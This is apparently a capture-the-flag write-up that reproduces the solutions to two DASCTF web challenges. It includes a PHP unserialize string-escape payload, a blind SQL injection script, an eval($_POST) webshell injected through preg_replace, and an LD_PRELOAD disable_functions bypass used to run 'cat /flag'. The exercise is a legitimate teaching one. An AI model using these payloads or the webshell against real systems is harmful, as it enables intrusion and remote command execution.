
DASCTF-两道web题复现_dasctf{


记录一下官方题解

Ezunserialize

打开题目看到源码

  <?php
  // Print this script's own source to the client (show_source() is an alias of
  // highlight_file(); the listing below is what the player sees).
  highlight_file("index.php");
  /**
   * Rewrites every 3-byte sequence NUL '*' NUL (the marker PHP's serialize()
   * emits for protected properties) as the 6-character literal \0\0\0.
   *
   * NOTE(review): the result is 3 bytes longer per match, while the "s:N:"
   * length prefixes already written by serialize() are left untouched. Applied
   * to serialized data this desynchronises length and content; escaping of this
   * kind belongs before serialization, not after.
   *
   * @param string $data serialized payload
   * @return string      payload with the marker expanded
   */
  function write($data)
  {
      $marker  = chr(0) . '*' . chr(0);
      $escaped = '\0\0\0';
      return str_replace($marker, $escaped, $data);
  }
  /**
   * Inverse of write(): every 6-character literal \0\0\0 becomes the 3-byte
   * sequence NUL '*' NUL again.
   *
   * NOTE(review): each match shrinks the data by 3 bytes; a caller that chose
   * the stored value can therefore make the "s:N:" prefix claim more bytes than
   * the field now holds, and unserialize() will read past it.
   *
   * @param string $data stored payload
   * @return string      payload with the marker restored
   */
  function read($data)
  {
      $escaped = '\0\0\0';
      $marker  = chr(0) . '*' . chr(0);
      return str_replace($escaped, $marker, $data);
  }
  /**
   * Plain credential holder. Both properties are public, so serialize() emits
   * them in declaration order: "username" first, then "password".
   */
  class A
  {
      public $username;
      public $password;

      /**
       * @param mixed $a stored as the username
       * @param mixed $b stored as the password
       */
      public function __construct($a, $b)
      {
          // Independent assignments; order does not affect the serialized form.
          $this->password = $b;
          $this->username = $a;
      }
  }
  /**
   * Holds a single value and prints it, prefixed with 'a', when destroyed.
   */
  class B
  {
      public $b = 'gqy';

      /**
       * The concatenation converts $b to a string, so an object stored in $b
       * has its __toString() run from here — the B -> C step of the chain
       * described on this page.
       */
      public function __destruct()
      {
          $prefix = 'a';
          echo $prefix . $this->b;
      }
  }
  /**
   * String conversion with a side effect: prints the contents of the file
   * named by $c, then yields the fixed text 'nice'.
   */
  class C
  {
      public $c;

      /**
       * @return string always 'nice'
       */
      public function __toString()
      {
          //flag.php
          // The path is whatever $c holds; nothing restricts it.
          $contents = file_get_contents($this->c);
          print $contents;
          return 'nice';
      }
  }
  // Build the credential object straight from the query string.
  $a = new A($_GET['a'],$_GET['b']);
  // The step that stores the serialized data is omitted; below it is taken back
  // out and unserialized.
  // NOTE(review): unserialize() on data derived from request parameters is the
  // risk here — write()/read() change the length of the string contents without
  // touching the s:N: prefixes serialize() produced.
  $stored = write(serialize($a));
  $b = unserialize(read($stored));

先实现B->C

  // Build the B -> C chain: C points at the file to read, B carries C so the
  // destructor's string conversion reaches C::__toString().
  $c = new C();
  $c->c = 'flag.php';
  $b = new B();
  $b->b = $c;
  $x = serialize($b);
  echo $x;
  //O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}

然后就是字符串逃逸实现A->B

  // Username: 24 copies of the two-byte literal \0 (48 bytes). Password: the
  // serialized B -> C chain, preceded by the bytes that close the username field.
  $a = new A("\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0",'1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}};}');
  $a = serialize($a);
  echo $a."\n";
  // write(): neither value contains NUL '*' NUL, so this step changes nothing here.
  $a = write($a);
  echo $a."\n";
  // read(): every 6-byte \0\0\0 shrinks to 3 bytes while the s:48: prefix is
  // unchanged, so unserialize() keeps reading into the password value.
  $a = read($a);
  echo $a."\n";

将 payload 进行 URL 编码

a=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&b=1%22%3Bs%3A8%3A%22password%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A1%3A%22b%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A1%3A%22c%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D

babytricks

打开题目是个登录界面,查看源码发现提示

<!-- tips:select * from user where user='$user' and passwd='%s'-->

这是一个格式化字符串漏洞,过滤了 select、单引号、like、regexp。用下面的脚本逐位跑出密码,注意密码最后一位需要减一

  # Boolean-based blind extraction against the challenge login (Python 2: note
  # the `print flag` statement at the end). The listing lost its indentation on
  # the blog; the structure is an outer loop over character positions and an
  # inner 7-round binary search on the character value.
  # Defender notes: the server-side query is built with a format string
  # (tip on this page), so parameterised queries are the fix; a burst of login
  # attempts whose username contains `between`/`CONCAT`/`BINARY` is the signal
  # to alert on.
  import requests
  flag=""
  flag2=""
  arg1=""
  arg2=""
  i=1
  n=2
  for i in range(1,28):
  print(i)
  # m is the candidate byte, j the current half-interval of the search.
  m=64
  j=64
  for q in range(1,8):
  if q!=1:
  j=j/2
  # n carries the previous round's verdict: 1 -> go up, 0 -> go down.
  if n==1:
  m=m+j
  elif n==0:
  m=m-j
  arg2=chr(m)
  # Prefix already recovered plus the candidate character.
  arg2=flag2+arg2
  url="http://183.129.189.60:10010/"
  # `%1$c` is consumed by the server's format string; passwd=39 presumably
  # becomes chr(39), a single quote — verify against the tip above. BINARY()
  # makes the comparison case-sensitive.
  user='%1$c^0 and passwd between CONCAT("{}",BINARY("")) and CONCAT("{}",BINARY(""))#'.format(arg1,arg2)
  #print user
  data={"user":user,
  "passwd":39
  }
  p=requests.post(url,data=data)
  # The error text in the response is the oracle.
  if "username or password error" not in p.text:
  n=0
  else:
  n=1
  # Last round: fix the character (the page notes the final one is off by one).
  if q==7:
  if "username or password error" not in p.text:
  flag=flag+chr(m-1)
  arg2=chr(m-1)
  flag2=flag2+arg2
  else:
  flag=flag+chr(m)
  flag2=arg2
  print flag
  #GoODLUcKcTFer202OHAckFuN

得到密码之后登录,提示前台什么都没有,添加admin目录进入后台登录页面,使用刚刚得到的密码,得到下一步源码

  1. Your sandbox: ./shells/iIu9B9eVuikO3cOi/ set your shell
  <?php
  // Suppressing all errors hides the warnings file_get_contents() and
  // preg_replace() would otherwise emit when they fail.
  error_reporting(0);
  session_save_path('session');
  session_start();
  require_once './init.php';
  // NOTE(review): loose comparison (!=), so any value that compares equal to 1
  // ("1", 1.0, true) passes; a strict `!== 1` would be the defensive form.
  if($_SESSION['login']!=1){
      die("<script>window.location.href='./index.php'</script>");
  }
  if($_GET['shell']){
      // addslashes() escapes quotes, backslashes and NUL; it does nothing about
      // the value ending up inside a PHP source file.
      $shell= addslashes($_GET['shell']);
      $file = file_get_contents('./shell.php');
      // The replacement string embeds user input, and preg_replace() interprets
      // $0 / \0 / ${n} in the replacement as backreferences — that is how the
      // "$0" payload on this page re-injects the previous match, quotes included.
      // Inserting the value via preg_replace_callback() (or as a var_export()
      // literal) would keep it inert; monitoring shell.php for writes would
      // surface the abuse.
      $file = preg_replace("/\\\$shell = '.*';/s", "\$shell = '{$shell}';", $file);
      file_put_contents('./shell.php', $file);
  }else{
      echo "set your shell"."<br>";
      chdir("/");
      highlight_file(dirname(__FILE__)."/admin.php");
  }
  ?>

payload

  1. ?shell=;eval($_POST[a]);
  2. ?shell=$0

shell.php文件中的代码

  <?php
  // State of shell.php after the two admin.php requests: "$0" expanded to the
  // whole previous match, so the single quote after "$shell = " now terminates
  // the string literal and eval($_POST[a]) runs as code whenever this file is
  // executed. An integrity check on this file would have flagged the change.
  $shell = '$shell = ';eval($_POST[a]);';';
  echo $shell;

由于这里过滤了很多系统函数,使用LD_PRELOAD进行bypass

  <?php
  // The widely published "bypass_disablefunc" script: the command line travels
  // through an environment variable, and a shared object named by the request
  // is loaded via LD_PRELOAD into the child process that the gnupg extension
  // presumably spawns (confirm for the installed version). Defender notes: the
  // preconditions are an unrestricted putenv() and a web-writable path for the
  // .so; cmd, outpath and sopath are taken from the query string unvalidated.
  echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
  $cmd = $_GET["cmd"];
  $out_path = $_GET["outpath"];
  $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
  echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
  // Both values are handed to the child process through its environment.
  putenv("EVIL_CMDLINE=" . $evil_cmdline);
  $so_path = $_GET["sopath"];
  putenv("LD_PRELOAD=" . $so_path);
  // The gnupg_* calls exist only to trigger the process spawn; their result is
  // irrelevant.
  $res = gnupg_init();
  gnupg_seterrormode($res, GNUPG_ERROR_WARNING);
  $info = gnupg_keyinfo($res, 'your-key-id');
  echo "Key - Info<pre>";
  var_dump($info);
  echo "<pre>";
  // Output was redirected to $out_path by the command line above.
  echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
  unlink($out_path);
  ?>

访问下面网址,得到flag

http://183.129.189.60:10010/admin/shells/R0zK2XMtjvzvyxWz/bypass.php?cmd=cat%20/flag&outpath=/var/www/html/admin/shells/R0zK2XMtjvzvyxWz/xx&sopath=/var/www/html/admin/shells/R0zK2XMtjvzvyxWz/bypass_disablefunc_x64.so

 
